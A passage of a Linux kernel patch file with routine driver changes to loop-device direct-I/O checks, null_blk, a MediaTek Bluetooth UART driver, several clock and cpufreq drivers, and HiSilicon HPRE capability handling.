++	if (lo->lo_offset & (sb_bsize - 1))
++		return false;
++	return true;
++}
++
+ static void __loop_update_dio(struct loop_device *lo, bool dio)
+ {
+ 	struct file *file = lo->lo_backing_file;
+-	struct address_space *mapping = file->f_mapping;
+-	struct inode *inode = mapping->host;
+-	unsigned short sb_bsize = 0;
+-	unsigned dio_align = 0;
++	struct inode *inode = file->f_mapping->host;
++	struct block_device *backing_bdev = NULL;
+ 	bool use_dio;
+ 
+-	if (inode->i_sb->s_bdev) {
+-		sb_bsize = bdev_logical_block_size(inode->i_sb->s_bdev);
+-		dio_align = sb_bsize - 1;
+-	}
++	if (S_ISBLK(inode->i_mode))
++		backing_bdev = I_BDEV(inode);
++	else if (inode->i_sb->s_bdev)
++		backing_bdev = inode->i_sb->s_bdev;
+ 
+-	/*
+-	 * We support direct I/O only if lo_offset is aligned with the
+-	 * logical I/O size of backing device, and the logical block
+-	 * size of loop is bigger than the backing device's.
+-	 *
+-	 * TODO: the above condition may be loosed in the future, and
+-	 * direct I/O may be switched runtime at that time because most
+-	 * of requests in sane applications should be PAGE_SIZE aligned
+-	 */
+-	if (dio) {
+-		if (queue_logical_block_size(lo->lo_queue) >= sb_bsize &&
+-		    !(lo->lo_offset & dio_align) &&
+-		    (file->f_mode & FMODE_CAN_ODIRECT))
+-			use_dio = true;
+-		else
+-			use_dio = false;
+-	} else {
+-		use_dio = false;
+-	}
++	use_dio = dio && (file->f_mode & FMODE_CAN_ODIRECT) &&
++		(!backing_bdev || lo_bdev_can_use_dio(lo, backing_bdev));
+ 
+ 	if (lo->use_dio == use_dio)
+ 		return;
+diff --git a/drivers/block/null_blk/main.c b/drivers/block/null_blk/main.c
+index e9f38eba2f133..959952e8ede38 100644
+--- a/drivers/block/null_blk/main.c
++++ b/drivers/block/null_blk/main.c
+@@ -2114,11 +2114,8 @@ static int null_add_dev(struct nullb_device *dev)
+ 
+ 	blk_queue_logical_block_size(nullb->q, dev->blocksize);
+ 	blk_queue_physical_block_size(nullb->q, dev->blocksize);
+-	if (!dev->max_sectors)
+-		dev->max_sectors = queue_max_hw_sectors(nullb->q);
+-	dev->max_sectors = min_t(unsigned int, dev->max_sectors,
+-				 BLK_DEF_MAX_SECTORS);
+-	blk_queue_max_hw_sectors(nullb->q, dev->max_sectors);
++	if (dev->max_sectors)
++		blk_queue_max_hw_sectors(nullb->q, dev->max_sectors);
+ 
+ 	if (dev->virt_boundary)
+ 		blk_queue_virt_boundary(nullb->q, PAGE_SIZE - 1);
+@@ -2218,12 +2215,6 @@ static int __init null_init(void)
+ 		g_bs = PAGE_SIZE;
+ 	}
+ 
+-	if (g_max_sectors > BLK_DEF_MAX_SECTORS) {
+-		pr_warn("invalid max sectors\n");
+-		pr_warn("defaults max sectors to %u\n", BLK_DEF_MAX_SECTORS);
+-		g_max_sectors = BLK_DEF_MAX_SECTORS;
+-	}
+-
+ 	if (g_home_node != NUMA_NO_NODE && g_home_node >= nr_online_nodes) {
+ 		pr_err("invalid home_node value\n");
+ 		g_home_node = NUMA_NO_NODE;
+diff --git a/drivers/bluetooth/btmtkuart.c b/drivers/bluetooth/btmtkuart.c
+index c98691cdbbd55..04b72394dda5b 100644
+--- a/drivers/bluetooth/btmtkuart.c
++++ b/drivers/bluetooth/btmtkuart.c
+@@ -337,7 +337,7 @@ mtk_stp_split(struct btmtkuart_dev *bdev, const unsigned char *data, int count,
+ 	return data;
+ }
+ 
+-static int btmtkuart_recv(struct hci_dev *hdev, const u8 *data, size_t count)
++static void btmtkuart_recv(struct hci_dev *hdev, const u8 *data, size_t count)
+ {
+ 	struct btmtkuart_dev *bdev = hci_get_drvdata(hdev);
+ 	const unsigned char *p_left = data, *p_h4;
+@@ -376,25 +376,20 @@ static int btmtkuart_recv(struct hci_dev *hdev, const u8 *data, size_t count)
+ 			bt_dev_err(bdev->hdev,
+ 				   "Frame reassembly failed (%d)", err);
+ 			bdev->rx_skb = NULL;
+-			return err;
++			return;
+ 		}
+ 
+ 		sz_left -= sz_h4;
+ 		p_left += sz_h4;
+ 	}
+-
+-	return 0;
+ }
+ 
+ static int btmtkuart_receive_buf(struct serdev_device *serdev, const u8 *data,
+ 				 size_t count)
+ {
+ 	struct btmtkuart_dev *bdev = serdev_device_get_drvdata(serdev);
+-	int err;
+ 
+-	err = btmtkuart_recv(bdev->hdev, data, count);
+-	if (err < 0)
+-		return err;
++	btmtkuart_recv(bdev->hdev, data, count);
+ 
+ 	bdev->hdev->stat.byte_rx += count;
+ 
+diff --git a/drivers/clk/clk-si5341.c b/drivers/clk/clk-si5341.c
+index c7d8cbd22bacc..5acb35236c58d 100644
+--- a/drivers/clk/clk-si5341.c
++++ b/drivers/clk/clk-si5341.c
+@@ -892,10 +892,8 @@ static int si5341_output_clk_set_rate(struct clk_hw *hw, unsigned long rate,
+ 	r[0] = r_div ? (r_div & 0xff) : 1;
+ 	r[1] = (r_div >> 8) & 0xff;
+ 	r[2] = (r_div >> 16) & 0xff;
+-	err = regmap_bulk_write(output->data->regmap,
++	return regmap_bulk_write(output->data->regmap,
+ 			SI5341_OUT_R_REG(output), r, 3);
+-
+-	return 0;
+ }
+ 
+ static int si5341_output_reparent(struct clk_si5341_output *output, u8 index)
+diff --git a/drivers/clk/qcom/gpucc-sm8150.c b/drivers/clk/qcom/gpucc-sm8150.c
+index 8422fd0474932..c89a5b59ddb7c 100644
+--- a/drivers/clk/qcom/gpucc-sm8150.c
++++ b/drivers/clk/qcom/gpucc-sm8150.c
+@@ -37,8 +37,8 @@ static struct alpha_pll_config gpu_cc_pll1_config = {
+ 	.config_ctl_hi_val = 0x00002267,
+ 	.config_ctl_hi1_val = 0x00000024,
+ 	.test_ctl_val = 0x00000000,
+-	.test_ctl_hi_val = 0x00000002,
+-	.test_ctl_hi1_val = 0x00000000,
++	.test_ctl_hi_val = 0x00000000,
++	.test_ctl_hi1_val = 0x00000020,
+ 	.user_ctl_val = 0x00000000,
+ 	.user_ctl_hi_val = 0x00000805,
+ 	.user_ctl_hi1_val = 0x000000d0,
+diff --git a/drivers/clk/qcom/videocc-sm8150.c b/drivers/clk/qcom/videocc-sm8150.c
+index 1afdbe4a249d6..52a9a453a1432 100644
+--- a/drivers/clk/qcom/videocc-sm8150.c
++++ b/drivers/clk/qcom/videocc-sm8150.c
+@@ -33,6 +33,7 @@ static struct alpha_pll_config video_pll0_config = {
+ 	.config_ctl_val = 0x20485699,
+ 	.config_ctl_hi_val = 0x00002267,
+ 	.config_ctl_hi1_val = 0x00000024,
++	.test_ctl_hi1_val = 0x00000020,
+ 	.user_ctl_val = 0x00000000,
+ 	.user_ctl_hi_val = 0x00000805,
+ 	.user_ctl_hi1_val = 0x000000D0,
+@@ -214,6 +215,10 @@ static const struct regmap_config video_cc_sm8150_regmap_config = {
+ 
+ static const struct qcom_reset_map video_cc_sm8150_resets[] = {
+ 	[VIDEO_CC_MVSC_CORE_CLK_BCR] = { 0x850, 2 },
++	[VIDEO_CC_INTERFACE_BCR] = { 0x8f0 },
++	[VIDEO_CC_MVS0_BCR] = { 0x870 },
++	[VIDEO_CC_MVS1_BCR] = { 0x8b0 },
++	[VIDEO_CC_MVSC_BCR] = { 0x810 },
+ };
+ 
+ static const struct qcom_cc_desc video_cc_sm8150_desc = {
+diff --git a/drivers/clk/renesas/rzg2l-cpg.c b/drivers/clk/renesas/rzg2l-cpg.c
+index 84767cfc1e739..473feb36a38f2 100644
+--- a/drivers/clk/renesas/rzg2l-cpg.c
++++ b/drivers/clk/renesas/rzg2l-cpg.c
+@@ -1115,41 +1115,33 @@ fail:
+ 
+ #define rcdev_to_priv(x)	container_of(x, struct rzg2l_cpg_priv, rcdev)
+ 
+-static int rzg2l_cpg_reset(struct reset_controller_dev *rcdev,
+-			   unsigned long id)
+-{
+-	struct rzg2l_cpg_priv *priv = rcdev_to_priv(rcdev);
+-	const struct rzg2l_cpg_info *info = priv->info;
+-	unsigned int reg = info->resets[id].off;
+-	u32 dis = BIT(info->resets[id].bit);
+-	u32 we = dis << 16;
+-
+-	dev_dbg(rcdev->dev, "reset id:%ld offset:0x%x\n", id, CLK_RST_R(reg));
+-
+-	/* Reset module */
+-	writel(we, priv->base + CLK_RST_R(reg));
+-
+-	/* Wait for at least one cycle of the RCLK clock (@ ca. 32 kHz) */
+-	udelay(35);
+-
+-	/* Release module from reset state */
+-	writel(we | dis, priv->base + CLK_RST_R(reg));
+-
+-	return 0;
+-}
+-
+ static int rzg2l_cpg_assert(struct reset_controller_dev *rcdev,
+ 			    unsigned long id)
+ {
+ 	struct rzg2l_cpg_priv *priv = rcdev_to_priv(rcdev);
+ 	const struct rzg2l_cpg_info *info = priv->info;
+ 	unsigned int reg = info->resets[id].off;
+-	u32 value = BIT(info->resets[id].bit) << 16;
++	u32 mask = BIT(info->resets[id].bit);
++	s8 monbit = info->resets[id].monbit;
++	u32 value = mask << 16;
+ 
+ 	dev_dbg(rcdev->dev, "assert id:%ld offset:0x%x\n", id, CLK_RST_R(reg));
+ 
+ 	writel(value, priv->base + CLK_RST_R(reg));
+-	return 0;
++
++	if (info->has_clk_mon_regs) {
++		reg = CLK_MRST_R(reg);
++	} else if (monbit >= 0) {
++		reg = CPG_RST_MON;
++		mask = BIT(monbit);
++	} else {
++		/* Wait for at least one cycle of the RCLK clock (@ ca. 32 kHz) */
++		udelay(35);
++		return 0;
++	}
++
++	return readl_poll_timeout_atomic(priv->base + reg, value,
++					 value & mask, 10, 200);
+ }
+ 
+ static int rzg2l_cpg_deassert(struct reset_controller_dev *rcdev,
+@@ -1158,14 +1150,40 @@ static int rzg2l_cpg_deassert(struct reset_controller_dev *rcdev,
+ 	struct rzg2l_cpg_priv *priv = rcdev_to_priv(rcdev);
+ 	const struct rzg2l_cpg_info *info = priv->info;
+ 	unsigned int reg = info->resets[id].off;
+-	u32 dis = BIT(info->resets[id].bit);
+-	u32 value = (dis << 16) | dis;
++	u32 mask = BIT(info->resets[id].bit);
++	s8 monbit = info->resets[id].monbit;
++	u32 value = (mask << 16) | mask;
+ 
+ 	dev_dbg(rcdev->dev, "deassert id:%ld offset:0x%x\n", id,
+ 		CLK_RST_R(reg));
+ 
+ 	writel(value, priv->base + CLK_RST_R(reg));
+-	return 0;
++
++	if (info->has_clk_mon_regs) {
++		reg = CLK_MRST_R(reg);
++	} else if (monbit >= 0) {
++		reg = CPG_RST_MON;
++		mask = BIT(monbit);
++	} else {
++		/* Wait for at least one cycle of the RCLK clock (@ ca. 32 kHz) */
++		udelay(35);
++		return 0;
++	}
++
++	return readl_poll_timeout_atomic(priv->base + reg, value,
++					 !(value & mask), 10, 200);
++}
++
++static int rzg2l_cpg_reset(struct reset_controller_dev *rcdev,
++			   unsigned long id)
++{
++	int ret;
++
++	ret = rzg2l_cpg_assert(rcdev, id);
++	if (ret)
++		return ret;
++
++	return rzg2l_cpg_deassert(rcdev, id);
+ }
+ 
+ static int rzg2l_cpg_status(struct reset_controller_dev *rcdev,
+@@ -1173,18 +1191,21 @@ static int rzg2l_cpg_status(struct reset_controller_dev *rcdev,
+ {
+ 	struct rzg2l_cpg_priv *priv = rcdev_to_priv(rcdev);
+ 	const struct rzg2l_cpg_info *info = priv->info;
+-	unsigned int reg = info->resets[id].off;
+-	u32 bitmask = BIT(info->resets[id].bit);
+ 	s8 monbit = info->resets[id].monbit;
++	unsigned int reg;
++	u32 bitmask;
+ 
+ 	if (info->has_clk_mon_regs) {
+-		return !!(readl(priv->base + CLK_MRST_R(reg)) & bitmask);
++		reg = CLK_MRST_R(info->resets[id].off);
++		bitmask = BIT(info->resets[id].bit);
+ 	} else if (monbit >= 0) {
+-		u32 monbitmask = BIT(monbit);
+-
+-		return !!(readl(priv->base + CPG_RST_MON) & monbitmask);
++		reg = CPG_RST_MON;
++		bitmask = BIT(monbit);
++	} else {
++		return -ENOTSUPP;
+ 	}
+-	return -ENOTSUPP;
++
++	return !!(readl(priv->base + reg) & bitmask);
+ }
+ 
+ static const struct reset_control_ops rzg2l_cpg_reset_ops = {
+diff --git a/drivers/clk/zynqmp/clk-mux-zynqmp.c b/drivers/clk/zynqmp/clk-mux-zynqmp.c
+index 60359333f26db..9b5d3050b7422 100644
+--- a/drivers/clk/zynqmp/clk-mux-zynqmp.c
++++ b/drivers/clk/zynqmp/clk-mux-zynqmp.c
+@@ -89,7 +89,7 @@ static int zynqmp_clk_mux_set_parent(struct clk_hw *hw, u8 index)
+ static const struct clk_ops zynqmp_clk_mux_ops = {
+ 	.get_parent = zynqmp_clk_mux_get_parent,
+ 	.set_parent = zynqmp_clk_mux_set_parent,
+-	.determine_rate = __clk_mux_determine_rate,
++	.determine_rate = __clk_mux_determine_rate_closest,
+ };
+ 
+ static const struct clk_ops zynqmp_clk_mux_ro_ops = {
+diff --git a/drivers/clk/zynqmp/divider.c b/drivers/clk/zynqmp/divider.c
+index 33a3b2a226595..5a00487ae408b 100644
+--- a/drivers/clk/zynqmp/divider.c
++++ b/drivers/clk/zynqmp/divider.c
+@@ -110,52 +110,6 @@ static unsigned long zynqmp_clk_divider_recalc_rate(struct clk_hw *hw,
+ 	return DIV_ROUND_UP_ULL(parent_rate, value);
+ }
+ 
+-static void zynqmp_get_divider2_val(struct clk_hw *hw,
+-				    unsigned long rate,
+-				    struct zynqmp_clk_divider *divider,
+-				    u32 *bestdiv)
+-{
+-	int div1;
+-	int div2;
+-	long error = LONG_MAX;
+-	unsigned long div1_prate;
+-	struct clk_hw *div1_parent_hw;
+-	struct zynqmp_clk_divider *pdivider;
+-	struct clk_hw *div2_parent_hw = clk_hw_get_parent(hw);
+-
+-	if (!div2_parent_hw)
+-		return;
+-
+-	pdivider = to_zynqmp_clk_divider(div2_parent_hw);
+-	if (!pdivider)
+-		return;
+-
+-	div1_parent_hw = clk_hw_get_parent(div2_parent_hw);
+-	if (!div1_parent_hw)
+-		return;
+-
+-	div1_prate = clk_hw_get_rate(div1_parent_hw);
+-	*bestdiv = 1;
+-	for (div1 = 1; div1 <= pdivider->max_div;) {
+-		for (div2 = 1; div2 <= divider->max_div;) {
+-			long new_error = ((div1_prate / div1) / div2) - rate;
+-
+-			if (abs(new_error) < abs(error)) {
+-				*bestdiv = div2;
+-				error = new_error;
+-			}
+-			if (divider->flags & CLK_DIVIDER_POWER_OF_TWO)
+-				div2 = div2 << 1;
+-			else
+-				div2++;
+-		}
+-		if (pdivider->flags & CLK_DIVIDER_POWER_OF_TWO)
+-			div1 = div1 << 1;
+-		else
+-			div1++;
+-	}
+-}
+-
+ /**
+  * zynqmp_clk_divider_round_rate() - Round rate of divider clock
+  * @hw:			handle between common and hardware-specific interfaces
+@@ -174,6 +128,7 @@ static long zynqmp_clk_divider_round_rate(struct clk_hw *hw,
+ 	u32 div_type = divider->div_type;
+ 	u32 bestdiv;
+ 	int ret;
++	u8 width;
+ 
+ 	/* if read only, just return current value */
+ 	if (divider->flags & CLK_DIVIDER_READ_ONLY) {
+@@ -193,23 +148,12 @@ static long zynqmp_clk_divider_round_rate(struct clk_hw *hw,
+ 		return DIV_ROUND_UP_ULL((u64)*prate, bestdiv);
+ 	}
+ 
+-	bestdiv = zynqmp_divider_get_val(*prate, rate, divider->flags);
+-
+-	/*
+-	 * In case of two divisors, compute best divider values and return
+-	 * divider2 value based on compute value. div1 will  be automatically
+-	 * set to optimum based on required total divider value.
+-	 */
+-	if (div_type == TYPE_DIV2 &&
+-	    (clk_hw_get_flags(hw) & CLK_SET_RATE_PARENT)) {
+-		zynqmp_get_divider2_val(hw, rate, divider, &bestdiv);
+-	}
++	width = fls(divider->max_div);
+ 
+-	if ((clk_hw_get_flags(hw) & CLK_SET_RATE_PARENT) && divider->is_frac)
+-		bestdiv = rate % *prate ? 1 : bestdiv;
++	rate = divider_round_rate(hw, rate, prate, NULL, width, divider->flags);
+ 
+-	bestdiv = min_t(u32, bestdiv, divider->max_div);
+-	*prate = rate * bestdiv;
++	if (divider->is_frac && (clk_hw_get_flags(hw) & CLK_SET_RATE_PARENT) && (rate % *prate))
++		*prate = rate;
+ 
+ 	return rate;
+ }
+diff --git a/drivers/clocksource/timer-ti-dm.c b/drivers/clocksource/timer-ti-dm.c
+index ec86aecb748f1..7f9c1f58a9477 100644
+--- a/drivers/clocksource/timer-ti-dm.c
++++ b/drivers/clocksource/timer-ti-dm.c
+@@ -184,7 +184,7 @@ static inline u32 dmtimer_read(struct dmtimer *timer, u32 reg)
+  * dmtimer_write - write timer registers in posted and non-posted mode
+  * @timer:      timer pointer over which write operation is to perform
+  * @reg:        lowest byte holds the register offset
+- * @value:      data to write into the register
++ * @val:        data to write into the register
+  *
+  * The posted mode bit is encoded in reg. Note that in posted mode, the write
+  * pending bit must be checked. Otherwise a write on a register which has a
+@@ -937,7 +937,7 @@ static int omap_dm_timer_set_int_enable(struct omap_dm_timer *cookie,
+ 
+ /**
+  * omap_dm_timer_set_int_disable - disable timer interrupts
+- * @timer:	pointer to timer handle
++ * @cookie:	pointer to timer cookie
+  * @mask:	bit mask of interrupts to be disabled
+  *
+  * Disables the specified timer interrupts for a timer.
+diff --git a/drivers/cpufreq/cpufreq-dt-platdev.c b/drivers/cpufreq/cpufreq-dt-platdev.c
+index 69a8742c0a7a3..8514bb62dd10b 100644
+--- a/drivers/cpufreq/cpufreq-dt-platdev.c
++++ b/drivers/cpufreq/cpufreq-dt-platdev.c
+@@ -176,7 +176,7 @@ static bool __init cpu0_node_has_opp_v2_prop(void)
+ 	struct device_node *np = of_cpu_device_node_get(0);
+ 	bool ret = false;
+ 
+-	if (of_get_property(np, "operating-points-v2", NULL))
++	if (of_property_present(np, "operating-points-v2"))
+ 		ret = true;
+ 
+ 	of_node_put(np);
+diff --git a/drivers/cpufreq/imx-cpufreq-dt.c b/drivers/cpufreq/imx-cpufreq-dt.c
+index 76e553af20711..535867a7dfdde 100644
+--- a/drivers/cpufreq/imx-cpufreq-dt.c
++++ b/drivers/cpufreq/imx-cpufreq-dt.c
+@@ -89,7 +89,7 @@ static int imx_cpufreq_dt_probe(struct platform_device *pdev)
+ 
+ 	cpu_dev = get_cpu_device(0);
+ 
+-	if (!of_find_property(cpu_dev->of_node, "cpu-supply", NULL))
++	if (!of_property_present(cpu_dev->of_node, "cpu-supply"))
+ 		return -ENODEV;
+ 
+ 	if (of_machine_is_compatible("fsl,imx7ulp")) {
+diff --git a/drivers/cpufreq/imx6q-cpufreq.c b/drivers/cpufreq/imx6q-cpufreq.c
+index 925fc17eaacb2..39b0362a3b9ac 100644
+--- a/drivers/cpufreq/imx6q-cpufreq.c
++++ b/drivers/cpufreq/imx6q-cpufreq.c
+@@ -230,7 +230,7 @@ static int imx6q_opp_check_speed_grading(struct device *dev)
+ 	u32 val;
+ 	int ret;
+ 
+-	if (of_find_property(dev->of_node, "nvmem-cells", NULL)) {
++	if (of_property_present(dev->of_node, "nvmem-cells")) {
+ 		ret = nvmem_cell_read_u32(dev, "speed_grade", &val);
+ 		if (ret)
+ 			return ret;
+@@ -285,7 +285,7 @@ static int imx6ul_opp_check_speed_grading(struct device *dev)
+ 	u32 val;
+ 	int ret = 0;
+ 
+-	if (of_find_property(dev->of_node, "nvmem-cells", NULL)) {
++	if (of_property_present(dev->of_node, "nvmem-cells")) {
+ 		ret = nvmem_cell_read_u32(dev, "speed_grade", &val);
+ 		if (ret)
+ 			return ret;
+diff --git a/drivers/cpufreq/scmi-cpufreq.c b/drivers/cpufreq/scmi-cpufreq.c
+index 513a071845c26..028df8a5f537a 100644
+--- a/drivers/cpufreq/scmi-cpufreq.c
++++ b/drivers/cpufreq/scmi-cpufreq.c
+@@ -310,8 +310,11 @@ static int scmi_cpufreq_probe(struct scmi_device *sdev)
+ 
+ #ifdef CONFIG_COMMON_CLK
+ 	/* dummy clock provider as needed by OPP if clocks property is used */
+-	if (of_find_property(dev->of_node, "#clock-cells", NULL))
+-		devm_of_clk_add_hw_provider(dev, of_clk_hw_simple_get, NULL);
++	if (of_property_present(dev->of_node, "#clock-cells")) {
++		ret = devm_of_clk_add_hw_provider(dev, of_clk_hw_simple_get, NULL);
++		if (ret)
++			return dev_err_probe(dev, ret, "%s: registering clock provider failed\n", __func__);
++	}
+ #endif
+ 
+ 	ret = cpufreq_register_driver(&scmi_cpufreq_driver);
+diff --git a/drivers/cpufreq/tegra20-cpufreq.c b/drivers/cpufreq/tegra20-cpufreq.c
+index ab7ac7df9e62e..dfd2de4f8e07e 100644
+--- a/drivers/cpufreq/tegra20-cpufreq.c
++++ b/drivers/cpufreq/tegra20-cpufreq.c
+@@ -25,7 +25,7 @@ static bool cpu0_node_has_opp_v2_prop(void)
+ 	struct device_node *np = of_cpu_device_node_get(0);
+ 	bool ret = false;
+ 
+-	if (of_get_property(np, "operating-points-v2", NULL))
++	if (of_property_present(np, "operating-points-v2"))
+ 		ret = true;
+ 
+ 	of_node_put(np);
+diff --git a/drivers/crypto/ccp/ccp-ops.c b/drivers/crypto/ccp/ccp-ops.c
+index aa4e1a5006919..cb8e99936abb7 100644
+--- a/drivers/crypto/ccp/ccp-ops.c
++++ b/drivers/crypto/ccp/ccp-ops.c
+@@ -179,8 +179,11 @@ static int ccp_init_dm_workarea(struct ccp_dm_workarea *wa,
+ 
+ 		wa->dma.address = dma_map_single(wa->dev, wa->address, len,
+ 						 dir);
+-		if (dma_mapping_error(wa->dev, wa->dma.address))
++		if (dma_mapping_error(wa->dev, wa->dma.address)) {
++			kfree(wa->address);
++			wa->address = NULL;
+ 			return -ENOMEM;
++		}
+ 
+ 		wa->dma.length = len;
+ 	}
+diff --git a/drivers/crypto/hisilicon/hpre/hpre_main.c b/drivers/crypto/hisilicon/hpre/hpre_main.c
+index ff8a5f20a5df0..269df4ec148ba 100644
+--- a/drivers/crypto/hisilicon/hpre/hpre_main.c
++++ b/drivers/crypto/hisilicon/hpre/hpre_main.c
+@@ -118,8 +118,6 @@
+ #define HPRE_DFX_COMMON2_LEN		0xE
+ #define HPRE_DFX_CORE_LEN		0x43
+ 
+-#define HPRE_DEV_ALG_MAX_LEN	256
+-
+ static const char hpre_name[] = "hisi_hpre";
+ static struct dentry *hpre_debugfs_root;
+ static const struct pci_device_id hpre_dev_ids[] = {
+@@ -135,12 +133,7 @@ struct hpre_hw_error {
+ 	const char *msg;
+ };
+ 
+-struct hpre_dev_alg {
+-	u32 alg_msk;
+-	const char *alg;
+-};
+-
+-static const struct hpre_dev_alg hpre_dev_algs[] = {
++static const struct qm_dev_alg hpre_dev_algs[] = {
+ 	{
+ 		.alg_msk = BIT(0),
+ 		.alg = "rsa\n"
+@@ -233,6 +226,20 @@ static const struct hisi_qm_cap_info hpre_basic_info[] = {
+ 	{HPRE_CORE10_ALG_BITMAP_CAP, 0x3170, 0, GENMASK(31, 0), 0x0, 0x10, 0x10}
+ };
+ 
++enum hpre_pre_store_cap_idx {
++	HPRE_CLUSTER_NUM_CAP_IDX = 0x0,
++	HPRE_CORE_ENABLE_BITMAP_CAP_IDX,
++	HPRE_DRV_ALG_BITMAP_CAP_IDX,
++	HPRE_DEV_ALG_BITMAP_CAP_IDX,
++};
++
++static const u32 hpre_pre_store_caps[] = {
++	HPRE_CLUSTER_NUM_CAP,
++	HPRE_CORE_ENABLE_BITMAP_CAP,
++	HPRE_DRV_ALG_BITMAP_CAP,
++	HPRE_DEV_ALG_BITMAP_CAP,
++};
++
+ static const struct hpre_hw_error hpre_hw_errors[] = {
+ 	{
+ 		.int_msk = BIT(0),
+@@ -352,42 +359,13 @@ bool hpre_check_alg_support(struct hisi_qm *qm, u32 alg)
+ {
+ 	u32 cap_val;
+ 
+-	cap_val = hisi_qm_get_hw_info(qm, hpre_basic_info, HPRE_DRV_ALG_BITMAP_CAP, qm->cap_ver);
++	cap_val = qm->cap_tables.dev_cap_table[HPRE_DRV_ALG_BITMAP_CAP_IDX].cap_val;
+ 	if (alg & cap_val)
+ 		return true;
+ 
+ 	return false;
+ }
+ 
+-static int hpre_set_qm_algs(struct hisi_qm *qm)
+-{
+-	struct device *dev = &qm->pdev->dev;
+-	char *algs, *ptr;
+-	u32 alg_msk;
+-	int i;
+-
+-	if (!qm->use_sva)
+-		return 0;
+-
+-	algs = devm_kzalloc(dev, HPRE_DEV_ALG_MAX_LEN * sizeof(char), GFP_KERNEL);
+-	if (!algs)
+-		return -ENOMEM;
+-
+-	alg_msk = hisi_qm_get_hw_info(qm, hpre_basic_info, HPRE_DEV_ALG_BITMAP_CAP, qm->cap_ver);
+-
+-	for (i = 0; i < ARRAY_SIZE(hpre_dev_algs); i++)
+-		if (alg_msk & hpre_dev_algs[i].alg_msk)
+-			strcat(algs, hpre_dev_algs[i].alg);
+-
+-	ptr = strrchr(algs, '\n');
+-	if (ptr)
+-		*ptr = '\0';
+-
+-	qm->uacce->algs = algs;
+-
+-	return 0;
+-}
+-
+ static int hpre_diff_regs_show(struct seq_file *s, void *unused)
+ {
+ 	struct hisi_qm *qm = s->private;
+@@ -457,16 +435,6 @@ static u32 vfs_num;
+ module_param_cb(vfs_num, &vfs_num_ops, &vfs_num, 0444);
+ MODULE_PARM_DESC(vfs_num, "Number of VFs to enable(1-63), 0(default)");
+ 
+-static inline int hpre_cluster_num(struct hisi_qm *qm)
+-{
+-	return hisi_qm_get_hw_info(qm, hpre_basic_info, HPRE_CLUSTER_NUM_CAP, qm->cap_ver);
+-}
+-
+-static inline int hpre_cluster_core_mask(struct hisi_qm *qm)
+-{
+-	return hisi_qm_get_hw_info(qm, hpre_basic_info, HPRE_CORE_ENABLE_BITMAP_CAP, qm->cap_ver);
+-}
+-
+ struct hisi_qp *hpre_create_qp(u8 type)
+ {
+ 	int node = cpu_to_node(smp_processor_id());
+@@ -533,13 +501,15 @@ static int hpre_cfg_by_dsm(struct hisi_qm *qm)
+ 
+ static int hpre_set_cluster(struct hisi_qm *qm)
+ {
+-	u32 cluster_core_mask = hpre_cluster_core_mask(qm);
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	struct device *dev = &qm->pdev->dev;
+ 	unsigned long offset;
++	u32 cluster_core_mask;
++	u8 clusters_num;
+ 	u32 val = 0;
+ 	int ret, i;
+ 
++	cluster_core_mask = qm->cap_tables.dev_cap_table[HPRE_CORE_ENABLE_BITMAP_CAP_IDX].cap_val;
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	for (i = 0; i < clusters_num; i++) {
+ 		offset = i * HPRE_CLSTR_ADDR_INTRVL;
+ 
+@@ -734,11 +704,12 @@ static int hpre_set_user_domain_and_cache(struct hisi_qm *qm)
+ 
+ static void hpre_cnt_regs_clear(struct hisi_qm *qm)
+ {
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	unsigned long offset;
++	u8 clusters_num;
+ 	int i;
+ 
+ 	/* clear clusterX/cluster_ctrl */
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	for (i = 0; i < clusters_num; i++) {
+ 		offset = HPRE_CLSTR_BASE + i * HPRE_CLSTR_ADDR_INTRVL;
+ 		writel(0x0, qm->io_base + offset + HPRE_CLUSTER_INQURY);
+@@ -1025,13 +996,14 @@ static int hpre_pf_comm_regs_debugfs_init(struct hisi_qm *qm)
+ 
+ static int hpre_cluster_debugfs_init(struct hisi_qm *qm)
+ {
+-	u8 clusters_num = hpre_cluster_num(qm);
+ 	struct device *dev = &qm->pdev->dev;
+ 	char buf[HPRE_DBGFS_VAL_MAX_LEN];
+ 	struct debugfs_regset32 *regset;
+ 	struct dentry *tmp_d;
++	u8 clusters_num;
+ 	int i, ret;
+ 
++	clusters_num = qm->cap_tables.dev_cap_table[HPRE_CLUSTER_NUM_CAP_IDX].cap_val;
+ 	for (i = 0; i < clusters_num; i++) {
+ 		ret = snprintf(buf, HPRE_DBGFS_VAL_MAX_LEN, "cluster%d", i);
+ 		if (ret >= HPRE_DBGFS_VAL_MAX_LEN)
+@@ -1136,8 +1108,37 @@ static void hpre_debugfs_exit(struct hisi_qm *qm)
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ }
+ 
++static int hpre_pre_store_cap_reg(struct hisi_qm *qm)
++{
++	struct hisi_qm_cap_record *hpre_cap;
++	struct device *dev = &qm->pdev->dev;
++	size_t i, size;
++
++	size = ARRAY_SIZE(hpre_pre_store_caps);
++	hpre_cap = devm_kzalloc(dev, sizeof(*hpre_cap) * size, GFP_KERNEL);
++	if (!hpre_cap)
++		return -ENOMEM;
++
++	for (i = 0; i < size; i++) {
++		hpre_cap[i].type = hpre_pre_store_caps[i];
++		hpre_cap[i].cap_val = hisi_qm_get_hw_info(qm, hpre_basic_info,
++				      hpre_pre_store_caps[i], qm->cap_ver);
++	}
++
++	if (hpre_cap[HPRE_CLUSTER_NUM_CAP_IDX].cap_val > HPRE_CLUSTERS_NUM_MAX) {
++		dev_err(dev, "Device cluster num %u is out of range for driver supports %d!\n",
++			hpre_cap[HPRE_CLUSTER_NUM_CAP_IDX].cap_val, HPRE_CLUSTERS_NUM_MAX);
++		return -EINVAL;
++	}
++
++	qm->cap_tables.dev_cap_table = hpre_cap;
++
++	return 0;
++}
++
+ static int hpre_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ {
++	u64 alg_msk;
+ 	int ret;
+ 
+ 	if (pdev->revision == QM_HW_V1) {
+@@ -1168,7 +1169,16 @@ static int hpre_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		return ret;
+ 	}
+ 
+-	ret = hpre_set_qm_algs(qm);
++	/* Fetch and save the value of capability registers */
++	ret = hpre_pre_store_cap_reg(qm);
++	if (ret) {
++		pci_err(pdev, "Failed to pre-store capability registers!\n");
++		hisi_qm_uninit(qm);
++		return ret;
++	}
++
